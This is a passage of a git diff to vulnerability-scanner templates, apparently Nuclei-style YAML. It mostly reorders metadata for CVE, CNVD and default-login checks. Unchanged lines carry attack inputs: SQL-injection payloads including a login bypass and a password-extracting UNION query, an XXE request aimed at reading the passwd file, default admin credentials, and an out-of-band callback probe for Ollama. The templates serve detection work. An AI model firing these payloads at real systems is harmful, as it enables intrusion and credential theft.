cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:* http: - raw: - | @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml index 3286cff038..ac32a58e97 100755 --- a/http/cnvd/2022/CNVD-2022-43245.yaml +++ b/http/cnvd/2022/CNVD-2022-43245.yaml @@ -6,16 +6,16 @@ info: severity: high description: | e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information. + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="泛微-协同办公OA" - product: e-office vendor: weaver + product: e-office + fofa-query: app="泛微-协同办公OA" tags: cnvd,cnvd2022,weaver,e-office,oa,lfi - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* http: - raw: - | @@ -44,4 +44,4 @@ http: status: - 200 -# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2024/CNVD-2024-15077.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml index 2148afb423..8ea0fc4abc 100644 --- a/http/cnvd/2024/CNVD-2024-15077.yaml +++ b/http/cnvd/2024/CNVD-2024-15077.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md + classification: + cpe: cpe:2.3:a:anji-plus:aj-report:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="AJ-Report" - product: aj-report vendor: anji-plus + product: aj-report + fofa-query: title="AJ-Report" tags: cnvd,cnvd2024,aj-report,rce - classification: - cpe: cpe:2.3:a:anji-plus:aj-report:*:*:*:*:*:*:*:* http: - raw: - | @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42344.yaml b/http/cves/2023/CVE-2023-42344.yaml index b9744dd127..270edca2e9 100644 --- a/http/cves/2023/CVE-2023-42344.yaml +++ b/http/cves/2023/CVE-2023-42344.yaml @@ -10,28 +10,30 @@ info: reference: - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344 - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ + classification: + cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: "OpenCms-9.5.3" - product: opencms vendor: alkacon + product: opencms + fofa-query: "OpenCms-9.5.3" tags: cve,cve2023,xxe,opencms - classification: - cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* http: - method: POST path: - "{{BaseURL}}/opencms/cmisatom/cmis-online/query" - "{{BaseURL}}/cmisatom/cmis-online/query" + headers: Content-Type: "application/xml;charset=UTF-8" Referer: "{{RootURL}}" + body: | ]>&test;falsefalsenonecmis:none1000 - stop-at-first-match: true + matchers-condition: and matchers: - type: regex @@ -40,4 +42,5 @@ http: - "root:.*:0:0:" - "invalidArgument" condition: and -# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml index 869e007356..85a99b1c01 100644 --- a/http/cves/2024/CVE-2024-27564.yaml +++ b/http/cves/2024/CVE-2024-27564.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/dirk1983/chatgpt/issues/114 - https://nvd.nist.gov/vuln/detail/CVE-2024-27564 + classification: + cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: "title=\"ChatGPT个人专用版\"" - product: chatgpt_web vendor: chanzhaoyu + product: chatgpt_web + fofa-query: "title=\"ChatGPT个人专用版\"" tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi - classification: - cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,5 @@ http: - contains(header, "image/jpeg") - status_code == 200 condition: and -# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 9cb156a0bd..b01393d3dd 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -9,16 +9,16 @@ info: reference: - https://en.0day.today/exploit/39610 - https://www.sourcecodester.com/sql/17287/prison-management-system.html + classification: + cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"Prison Management System" - product: prison_management_system vendor: prison_management_system_project + product: prison_management_system + shodan-query: title:"Prison Management System" tags: cve,cve2024,cms,sqli - classification: - cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:* http: - raw: - | @@ -27,7 +27,6 @@ http: Content-Type: application/x-www-form-urlencoded txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin= - - | GET /Admin/index.php HTTP/1.1 Host: {{Hostname}} @@ -44,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml index 604a8996da..3bb2ec20d3 100644 --- a/http/cves/2024/CVE-2024-34982.yaml +++ b/http/cves/2024/CVE-2024-34982.yaml @@ -10,18 +10,16 @@ info: - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md - https://github.com/tanjiti/sec_profile - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py + classification: + cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: icon_hash="-282504889" - product: lylme_spage vendor: lylme + product: lylme_spage + fofa-query: icon_hash="-282504889" tags: cve,cve2024,lylme-spage,rce,intrusive - - classification: - cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:* flow: http(1) && http(2) - variables: string: "{{randstr}}" filename: "{{to_lower(rand_text_alpha(5))}}" @@ -73,4 +71,5 @@ http: - 'contains(body, "{{string}}" )' - 'contains(header, "text/html")' condition: and -# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index 3428af8a7a..c678dc903c 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -10,20 +10,18 @@ info: reference: - https://vulners.com/wpvulndb/CVE-2024-3552 - https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/ + classification: + cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 - publicwww-query: "/wp-content/plugins/web-directory-free" - product: web_directory_free vendor: salephpscripts + product: web_directory_free + publicwww-query: "/wp-content/plugins/web-directory-free" tags: cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free - - classification: - cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:* flow: http(1) && http(2) http: - - raw: - | GET / HTTP/1.1 @@ -51,4 +49,5 @@ http: - 'status_code == 200' - regex('^\[\]$', body) condition: and -# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml index 85a5d0386f..246defe82a 100644 --- a/http/cves/2024/CVE-2024-36837.yaml +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -9,16 +9,15 @@ info: reference: - https://github.com/phtcloud-dev/CVE-2024-36837 - https://nvd.nist.gov/vuln/detail/CVE-2024-36837 + classification: + cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="CRMEB" - product: crmeb vendor: crmeb + product: crmeb + fofa-query: title="CRMEB" tags: cve,cve2024,crmeb,sqli - - classification: - cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:* variables: num: "{{rand_int(9000000, 9999999)}}" @@ -44,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-37032.yaml b/http/cves/2024/CVE-2024-37032.yaml index 02b3acd935..3f57420cc9 100644 --- a/http/cves/2024/CVE-2024-37032.yaml +++ b/http/cves/2024/CVE-2024-37032.yaml @@ -10,16 +10,16 @@ info: - https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032 - https://nvd.nist.gov/vuln/detail/CVE-2024-37032 - https://github.com/Bi0x/CVE-2024-37032 + classification: + cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: ollama - product: ollama vendor: ollama + product: ollama + shodan-query: ollama tags: cve,cve2024,ollama,rce - classification: - cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:* http: - raw: - | @@ -28,7 +28,6 @@ http: Content-Type: application/json {"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true} - - | POST /api/push HTTP/1.1 Host: {{Hostname}} @@ -42,4 +41,5 @@ http: - contains(interactsh_protocol, 'http') - contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest') condition: and -# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-37152.yaml b/http/cves/2024/CVE-2024-37152.yaml index 4cc612cff9..9cc4efb619 100644 --- a/http/cves/2024/CVE-2024-37152.yaml +++ b/http/cves/2024/CVE-2024-37152.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/argoproj/argo-cd/security/advisories/GHSA-87p9-x75h-p4j2 - https://nvd.nist.gov/vuln/detail/CVE-2024-37152 + classification: + cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Argo CD" - product: argo_cd vendor: argoproj + product: argo_cd + shodan-query: html:"Argo CD" tags: cve,cve2024,argo-cd,info-leak - classification: - cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:* http: - raw: - | @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-38289.yaml b/http/cves/2024/CVE-2024-38289.yaml index 0884307817..7b70fa4203 100644 --- a/http/cves/2024/CVE-2024-38289.yaml +++ b/http/cves/2024/CVE-2024-38289.yaml @@ -8,16 +8,16 @@ info: A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server. reference: - https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v + classification: + cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"TurboMeeting" - product: turbomeeting vendor: rhubcom + product: turbomeeting + shodan-query: html:"TurboMeeting" tags: cve,cve2024,sqli,turbomeeting - classification: - cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:* http: - raw: - | @@ -26,7 +26,6 @@ http: Content-Type: application/x-www-form-urlencoded meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/** - - | POST /as/wapi/vmp HTTP/1.1 Host: {{Hostname}} @@ -45,4 +44,5 @@ http: part: body_2 words: - '<__Status__>FAILED' -# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index 85c348beff..d47f610520 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -13,16 +13,15 @@ info: reference: - https://dokan.co/docs/wordpress/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 + classification: + cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 2 - publicwww-query: "/wp-content/plugins/dokan-pro/" - product: dokan vendor: wedevs + product: dokan + publicwww-query: "/wp-content/plugins/dokan-pro/" tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli - - classification: - cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:* flow: http(1) && http(2) http: @@ -51,4 +50,5 @@ http: - 'duration>=6' - 'status_code == 302' condition: and -# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-6781.yaml b/http/cves/2024/CVE-2024-6781.yaml index 0ccb7dc58d..d2fde01514 100644 --- a/http/cves/2024/CVE-2024-6781.yaml +++ b/http/cves/2024/CVE-2024-6781.yaml @@ -8,17 +8,17 @@ info: Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0. reference: - https://starlabs.sg/advisories/24/24-6781/ - metadata: - shodan-query: html:"Calibre" - fofa-query: "Server: calibre" - verified: true - max-requeset: 1 - product: calibre - vendor: calibre-ebook - tags: cve,cve2024,calibre,lfi - classification: cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: calibre-ebook + product: calibre + shodan-query: html:"Calibre" + fofa-query: "Server: calibre" + max-requeset: 1 + tags: cve,cve2024,calibre,lfi + http: - raw: - | @@ -57,4 +57,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-6782.yaml b/http/cves/2024/CVE-2024-6782.yaml index 8b64b13d41..3ca2e59c62 100644 --- a/http/cves/2024/CVE-2024-6782.yaml +++ b/http/cves/2024/CVE-2024-6782.yaml @@ -8,17 +8,17 @@ info: Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0. reference: - https://starlabs.sg/advisories/24/24-6781/ + classification: + cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:* metadata: verified: true + vendor: calibre-ebook + product: calibre shodan-query: html:"Calibre" fofa-query: "Server: calibre" max-requeset: 1 - product: calibre - vendor: calibre-ebook tags: cve,cve2024,calibre,rce - classification: - cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:* http: - raw: - | @@ -63,4 +63,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml index f8757c6580..59a01b5a9b 100644 --- a/http/cves/2024/CVE-2024-6922.yaml +++ b/http/cves/2024/CVE-2024-6922.yaml @@ -12,6 +12,8 @@ info: - https://www.automationanywhere.com/products/automation-360 - https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/ - https://nvd.nist.gov/vuln/detail/CVE-2024-6922 + classification: + cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -21,8 +23,7 @@ info: vendor: automationanywhere tags: cve,cve2024,ssrf,oast,automation,anywhere - classification: - cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:* + http: - raw: - | diff --git a/http/default-logins/apache/apache-apollo-default-login.yaml b/http/default-logins/apache/apache-apollo-default-login.yaml index 63d0f61a53..4ee04c98cf 100644 --- a/http/default-logins/apache/apache-apollo-default-login.yaml +++ b/http/default-logins/apache/apache-apollo-default-login.yaml @@ -4,16 +4,15 @@ info: name: Apache Apollo - Default Login author: ritikchaddha severity: high + classification: + cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Apache Apollo" - product: activemq_apollo vendor: apache + product: activemq_apollo + shodan-query: title:"Apache Apollo" tags: apache,apollo,default-login,misconfig - - classification: - cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:* variables: username: 'admin' password: 'admin' @@ -26,7 +25,6 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{username}}&password={{password}} - - | GET /console/index.html HTTP/1.1 Host: {{Hostname}} @@ -49,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/apache/cloudstack-default-login.yaml b/http/default-logins/apache/cloudstack-default-login.yaml index 26110de641..726e1abcea 100644 --- a/http/default-logins/apache/cloudstack-default-login.yaml +++ b/http/default-logins/apache/cloudstack-default-login.yaml @@ -6,16 +6,16 @@ info: severity: high description: | CloudStack instance discovered using weak default credentials, allows the attacker to gain admin privilege. + classification: + cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Apache CloudStack" - product: cloudstack vendor: apache + product: cloudstack + shodan-query: http.title:"Apache CloudStack" tags: default-login,apache,cloudstack - classification: - cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* http: - raw: - | @@ -27,13 +27,11 @@ http: command=login&username={{username}}&password={{password}}&domain=%2F&response=json attack: pitchfork - payloads: username: - admin password: - password - host-redirects: true matchers: - type: dsl @@ -42,4 +40,5 @@ http: - "contains(content_type, 'application/json')" - "contains_all(body, 'sessionkey','domainid','userid')" condition: and -# digest: 4a0a00473045022100e14781f645e94e9addfd689f626c0fd7410a4c6abab76c419506a12a7e77b3c702203e536f8fc02f29d3744e77e3403890bbb63998656b7582421280bb32f31466a9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e14781f645e94e9addfd689f626c0fd7410a4c6abab76c419506a12a7e77b3c702203e536f8fc02f29d3744e77e3403890bbb63998656b7582421280bb32f31466a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/apache/kylin-default-login.yaml b/http/default-logins/apache/kylin-default-login.yaml index 1a8d093ee8..f4a2d89c87 100644 --- a/http/default-logins/apache/kylin-default-login.yaml +++ b/http/default-logins/apache/kylin-default-login.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml - https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker + classification: + cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 - fofa-query: app="APACHE-kylin" - product: kylin vendor: apache + product: kylin + fofa-query: app="APACHE-kylin" tags: kylin,default-login,apache - classification: - cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* http: - raw: - | @@ -56,4 +56,4 @@ http: status: - 200 -# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/apache/tomcat-default-login.yaml b/http/default-logins/apache/tomcat-default-login.yaml index 94a4226953..de9d55df06 100644 --- a/http/default-logins/apache/tomcat-default-login.yaml +++ b/http/default-logins/apache/tomcat-default-login.yaml @@ -8,15 +8,15 @@ info: reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt - metadata: - max-request: 405 - shodan-query: title:"Apache Tomcat" - product: tomcat - vendor: apache - tags: tomcat,apache,default-login - classification: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* + metadata: + max-request: 405 + vendor: apache + product: tomcat + shodan-query: title:"Apache Tomcat" + tags: tomcat,apache,default-login + http: - raw: - | @@ -98,4 +98,4 @@ http: status: - 200 -# digest: 4a0a00473045022100e2f0325cd0d99bcd7a23cd738065048220ea18532e54ce329ccfb3bb44866d9602202efadadca274034c7078a8104fc4df513dba2c17d33d76d104490d8cd85db915:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e2f0325cd0d99bcd7a23cd738065048220ea18532e54ce329ccfb3bb44866d9602202efadadca274034c7078a8104fc4df513dba2c17d33d76d104490d8cd85db915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/asus/asus-rtn16-default-login.yaml b/http/default-logins/asus/asus-rtn16-default-login.yaml index edf8280187..41d8cd9c76 100644 --- a/http/default-logins/asus/asus-rtn16-default-login.yaml +++ b/http/default-logins/asus/asus-rtn16-default-login.yaml @@ -6,16 +6,16 @@ info: severity: high description: | ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found. + classification: + cpe: cpe:2.3:h:asus:rt-n16:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "RT-N16" - product: rt-n16 vendor: asus + product: rt-n16 + shodan-query: "RT-N16" tags: default-login,asus,rt-n16 - classification: - cpe: cpe:2.3:h:asus:rt-n16:*:*:*:*:*:*:*:* http: - raw: - | @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/barco-clickshare-default-login.yaml b/http/default-logins/barco-clickshare-default-login.yaml index 